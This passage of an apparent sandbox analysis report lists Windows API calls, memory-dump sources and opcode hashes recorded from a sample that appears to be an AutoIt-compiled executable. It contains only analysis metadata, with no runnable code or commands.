                                                                • Instruction Fuzzy Hash: 34919D70A14209EFCF08EF58E8959BDB7B5FF49300F148059F8069B292DB79AE41CB60
                                                                APIs
                                                                  • Part of subcall function 00717620: _wcslen.LIBCMT ref: 00717625
                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0077C6EE
                                                                • _wcslen.LIBCMT ref: 0077C735
                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0077C79C
                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0077C7CA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ItemMenu$Info_wcslen$Default
                                                                • String ID: 0
                                                                • API String ID: 1227352736-4108050209
                                                                • Opcode ID: 9524ff773dc5870ba3009f2e4554cb33ade6b35976880d42d0c38e5e7812105c
                                                                • Instruction ID: e4276643fcd350c21c370fcc79d4352cc44f1fde62878ac59636615cd89e3e9b
                                                                • Opcode Fuzzy Hash: 9524ff773dc5870ba3009f2e4554cb33ade6b35976880d42d0c38e5e7812105c
                                                                • Instruction Fuzzy Hash: D751E2716043409BDB1A9F28C889B6B77E8AF8D390F04892DF999D31D1DB7CDD448B92
                                                                APIs
                                                                • ShellExecuteExW.SHELL32(0000003C), ref: 0079AEA3
                                                                  • Part of subcall function 00717620: _wcslen.LIBCMT ref: 00717625
                                                                • GetProcessId.KERNEL32(00000000), ref: 0079AF38
                                                                • CloseHandle.KERNEL32(00000000), ref: 0079AF67
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                • String ID: <$@
                                                                • API String ID: 146682121-1426351568
                                                                • Opcode ID: cdf2a832b94df7bd397ee55c17daef432c27488778508feb2b1fbb33577e4310
                                                                • Instruction ID: 9ccfbbed16f0a5db175c83c0e687b380da033b827b1b3618d9582f0dcd96bb2b
                                                                • Opcode Fuzzy Hash: cdf2a832b94df7bd397ee55c17daef432c27488778508feb2b1fbb33577e4310
                                                                • Instruction Fuzzy Hash: 8C715971A00615EFCF15DF58D489A9EBBF1BF08310F048499E816AB292CB79ED81CB91
                                                                APIs
                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00777206
                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0077723C
                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0077724D
                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007772CF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                • String ID: DllGetClassObject
                                                                • API String ID: 753597075-1075368562
                                                                • Opcode ID: dc975ce3799741bead7a939358c7a5cf81f4823c8aca7537842266290d497c5a
                                                                • Instruction ID: 68e2d1c8bd5cb6918dfde83badba3b5eedee120004a21fe97aa7bb55086fa275
                                                                • Opcode Fuzzy Hash: dc975ce3799741bead7a939358c7a5cf81f4823c8aca7537842266290d497c5a
                                                                • Instruction Fuzzy Hash: 94418FB1604204EFDF19CF54C884A9A7BB9FF89350F14C0A9BD099F20AD7B8D940DBA0
                                                                APIs
                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A3E35
                                                                • IsMenu.USER32(?), ref: 007A3E4A
                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007A3E92
                                                                • DrawMenuBar.USER32 ref: 007A3EA5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Menu$Item$DrawInfoInsert
                                                                • String ID: 0
                                                                • API String ID: 3076010158-4108050209
                                                                • Opcode ID: 9015fac6bc19d14dcec7cafc51b0da4d04f9dd4bbe15be1d4ea14440b64593fb
                                                                • Instruction ID: 13c184cca3bff44fc20c342e04d6f3f735ecc8592d8d89997c9b6857713b69ad
                                                                • Opcode Fuzzy Hash: 9015fac6bc19d14dcec7cafc51b0da4d04f9dd4bbe15be1d4ea14440b64593fb
                                                                • Instruction Fuzzy Hash: 17416A75A05209EFDB10DF50D884AEABBB5FF8A351F04822AF9159B250D738AE50CF50
                                                                APIs
                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007A2F8D
                                                                • LoadLibraryW.KERNEL32(?), ref: 007A2F94
                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 007A2FA9
                                                                • DestroyWindow.USER32(?), ref: 007A2FB1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                • String ID: SysAnimate32
                                                                • API String ID: 3529120543-1011021900
                                                                • Opcode ID: a606cb0fc9f22cb9ef4772d077992dbe7d9d1ce3783bef8f7214c8a80ca442d3
                                                                • Instruction ID: f1e19102666e9e5b69d669826fb8565fd56d8cfd3d80efd865fab22f27d7219a
                                                                • Opcode Fuzzy Hash: a606cb0fc9f22cb9ef4772d077992dbe7d9d1ce3783bef8f7214c8a80ca442d3
                                                                • Instruction Fuzzy Hash: 9421FD71200209AFEB118F68DC84FBB37BDEB9A364F104718FA10D61A1D739DC829760
                                                                APIs
                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00734D1E,007428E9,?,00734CBE,007428E9,007D88B8,0000000C,00734E15,007428E9,00000002), ref: 00734D8D
                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00734DA0
                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00734D1E,007428E9,?,00734CBE,007428E9,007D88B8,0000000C,00734E15,007428E9,00000002,00000000), ref: 00734DC3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                • String ID: CorExitProcess$mscoree.dll
                                                                • API String ID: 4061214504-1276376045
                                                                • Opcode ID: 2c08451982a47ae69370906c79a6187338dfae6dd7db653a4dd90a49e9105535
                                                                • Instruction ID: 410814cb9ab3bce3f687c58d6921a141659b18509778921c9d3cc090cd145da4
                                                                • Opcode Fuzzy Hash: 2c08451982a47ae69370906c79a6187338dfae6dd7db653a4dd90a49e9105535
                                                                • Instruction Fuzzy Hash: 2EF0AF70A00208BBEB169F90DC09BEEBFF5EF44711F0040A4F906A2261CF38AD40CAD4
                                                                APIs
                                                                • LoadLibraryA.KERNEL32 ref: 0076D3AD
                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0076D3BF
                                                                • FreeLibrary.KERNEL32(00000000), ref: 0076D3E5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Library$AddressFreeLoadProc
                                                                • String ID: GetSystemWow64DirectoryW$X64
                                                                • API String ID: 145871493-2590602151
                                                                • Opcode ID: edc6575d6ff3e1db41f52acbc7fe7cac23d8edf1378b8316a22e1e817358884a
                                                                • Instruction ID: 3f2dcebd46b362c5cb135a191aec6b4663c8788ddf74b382f0d6329337a4021d
                                                                • Opcode Fuzzy Hash: edc6575d6ff3e1db41f52acbc7fe7cac23d8edf1378b8316a22e1e817358884a
                                                                • Instruction Fuzzy Hash: 58F055F0F26620EFD7322712CC289293220BF42701B688165FC03E5210EB7CCC408A97
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00714EDD,?,007E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00714E9C
                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00714EAE
                                                                • FreeLibrary.KERNEL32(00000000,?,?,00714EDD,?,007E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00714EC0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Library$AddressFreeLoadProc
                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                • API String ID: 145871493-3689287502
                                                                • Opcode ID: 506b291061bb901010142dc8cf4a0aa2a89482770ee3292f8f75991103ca582b
                                                                • Instruction ID: 9aa1a6f459f2c48c6ea7790d064aaf66b3c68a590e72d875e08959f4af8f7bb3
                                                                • Opcode Fuzzy Hash: 506b291061bb901010142dc8cf4a0aa2a89482770ee3292f8f75991103ca582b
                                                                • Instruction Fuzzy Hash: EBE0CD75B015227BD3331729FC18B9F6554AFC3F627054215FC05D2240DB6CCD4544B5
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00753CDE,?,007E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00714E62
                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00714E74
                                                                • FreeLibrary.KERNEL32(00000000,?,?,00753CDE,?,007E1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00714E87
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Library$AddressFreeLoadProc
                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                • API String ID: 145871493-1355242751
                                                                • Opcode ID: 30ab4ae6ec78a45eac47b155025840616053b3011a891292e85c91f327e4b905
                                                                • Instruction ID: 78e65608dd35b7b3e62933c9fc941a8e462dfecf3b900d250eb1922a456da8b8
                                                                • Opcode Fuzzy Hash: 30ab4ae6ec78a45eac47b155025840616053b3011a891292e85c91f327e4b905
                                                                • Instruction Fuzzy Hash: 5DD0C2756026227747231B28BC09DCB2A18AFC2B113054211F801A2150CF2DCD4281E4
                                                                APIs
                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00782C05
                                                                • DeleteFileW.KERNEL32(?), ref: 00782C87
                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00782C9D
                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00782CAE
                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00782CC0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: File$Delete$Copy
                                                                • String ID:
                                                                • API String ID: 3226157194-0
                                                                • Opcode ID: 7ad573deb9425d1e180062dc453392705985674d9cdf39e94da5958f77e1dc0c
                                                                • Instruction ID: 254bfb0f410f271fcb47f30e0e50e50b879f0c9a7082e3327118a3b2c01e4d0b
                                                                • Opcode Fuzzy Hash: 7ad573deb9425d1e180062dc453392705985674d9cdf39e94da5958f77e1dc0c
                                                                • Instruction Fuzzy Hash: B8B16071D01119EBDF25EBA4CC89EDEBB7DEF48310F1040A6F509E6142EB399A458F61
                                                                APIs
                                                                • GetCurrentProcessId.KERNEL32 ref: 0079A427
                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0079A435
                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0079A468
                                                                • CloseHandle.KERNEL32(?), ref: 0079A63D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                                • String ID:
                                                                • API String ID: 3488606520-0
                                                                • Opcode ID: 9e1fa1ef340e2725c8df0ce4f4a3b7a3a4489a002ce931f95b54674a846398c7
                                                                • Instruction ID: f0654350a0f4ab12c15a14ad1be2623ee47ef16e567ca7009ffcbe1bab95f825
                                                                • Opcode Fuzzy Hash: 9e1fa1ef340e2725c8df0ce4f4a3b7a3a4489a002ce931f95b54674a846398c7
                                                                • Instruction Fuzzy Hash: D4A16371604301AFDB20DF28D88AF2AB7E5AF84714F14885DF9599B2D2DB74EC41CB92
                                                                APIs
                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,007B3700), ref: 0074BB91
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,007E121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0074BC09
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,007E1270,000000FF,?,0000003F,00000000,?), ref: 0074BC36
                                                                • _free.LIBCMT ref: 0074BB7F
                                                                  • Part of subcall function 007429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0074D7D1,00000000,00000000,00000000,00000000,?,0074D7F8,00000000,00000007,00000000,?,0074DBF5,00000000), ref: 007429DE
                                                                  • Part of subcall function 007429C8: GetLastError.KERNEL32(00000000,?,0074D7D1,00000000,00000000,00000000,00000000,?,0074D7F8,00000000,00000007,00000000,?,0074DBF5,00000000,00000000), ref: 007429F0
                                                                • _free.LIBCMT ref: 0074BD4B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                • String ID:
                                                                • API String ID: 1286116820-0
                                                                • Opcode ID: 829a87ff1201dc7a0f427eea7a63ad545f4b10913166f5c18cf583f0d60d4296
                                                                • Instruction ID: 51849eb818130a8ba831df56c52fd57aabaee995ffc31dd87913a8d783ac7da9
                                                                • Opcode Fuzzy Hash: 829a87ff1201dc7a0f427eea7a63ad545f4b10913166f5c18cf583f0d60d4296
                                                                • Instruction Fuzzy Hash: 0151C571A00209EFCB10EF659CC69AEB7BCFF45310B5142AAE554D71A1EB38DE41CBA4
                                                                APIs
                                                                  • Part of subcall function 0077DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0077CF22,?), ref: 0077DDFD
                                                                  • Part of subcall function 0077DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0077CF22,?), ref: 0077DE16
                                                                  • Part of subcall function 0077E199: GetFileAttributesW.KERNEL32(?,0077CF95), ref: 0077E19A
                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0077E473
                                                                • MoveFileW.KERNEL32(?,?), ref: 0077E4AC
                                                                • _wcslen.LIBCMT ref: 0077E5EB
                                                                • _wcslen.LIBCMT ref: 0077E603
                                                                • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0077E650
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                • String ID:
                                                                • API String ID: 3183298772-0
                                                                • Opcode ID: a681c5ff316cd3d822c3c13274a0272721963f8dc7aff9782bb8e3f3bd9d046b
                                                                • Instruction ID: 7de46a64412b19a985d649f4bd1f46299dd7428d67a1b5e1c57d249a61f8507e
                                                                • Opcode Fuzzy Hash: a681c5ff316cd3d822c3c13274a0272721963f8dc7aff9782bb8e3f3bd9d046b
                                                                • Instruction Fuzzy Hash: 7351B8B25083859BDB34DB94CC859DF73DCAF89340F00491EF689D3191EF79A6888766
                                                                APIs
                                                                  • Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD
                                                                  • Part of subcall function 0079C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0079B6AE,?,?), ref: 0079C9B5
                                                                  • Part of subcall function 0079C998: _wcslen.LIBCMT ref: 0079C9F1
                                                                  • Part of subcall function 0079C998: _wcslen.LIBCMT ref: 0079CA68
                                                                  • Part of subcall function 0079C998: _wcslen.LIBCMT ref: 0079CA9E
                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0079BAA5
                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0079BB00
                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0079BB63
                                                                • RegCloseKey.ADVAPI32(?,?), ref: 0079BBA6
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0079BBB3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                • String ID:
                                                                • API String ID: 826366716-0
                                                                • Opcode ID: dfe1c56ba07afd5cbddc69ad3a4f45c0020937f78a1725c4f3ba33b8837d8c49
                                                                • Instruction ID: f12b0e1ef2ac51e472d8c5aceb3025810dc2680a41d8c304e53d2bdff3e6ae3b
                                                                • Opcode Fuzzy Hash: dfe1c56ba07afd5cbddc69ad3a4f45c0020937f78a1725c4f3ba33b8837d8c49
                                                                • Instruction Fuzzy Hash: B461E371208241EFC714DF24D994E6ABBE5FF84308F14855CF4998B2A2DB39ED45CB92
                                                                APIs
                                                                • VariantInit.OLEAUT32(?), ref: 00778BCD
                                                                • VariantClear.OLEAUT32 ref: 00778C3E
                                                                • VariantClear.OLEAUT32 ref: 00778C9D
                                                                • VariantClear.OLEAUT32(?), ref: 00778D10
                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00778D3B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Variant$Clear$ChangeInitType
                                                                • String ID:
                                                                • API String ID: 4136290138-0
                                                                • Opcode ID: ae19fbed29144ec61f156ac0ef7788505ace1e69d5f7302c0b2264a8758e73e9
                                                                • Instruction ID: 92bb5fa71d503dab30741ee3f898015536c8387d4b4e8cf3e505d85c9ef84007
                                                                • Opcode Fuzzy Hash: ae19fbed29144ec61f156ac0ef7788505ace1e69d5f7302c0b2264a8758e73e9
                                                                • Instruction Fuzzy Hash: 29516DB5A00219EFCB10CF68C894AAABBF4FF8D350B158559E919DB350E734E911CFA4
                                                                APIs
                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00788BAE
                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00788BDA
                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00788C32
                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00788C57
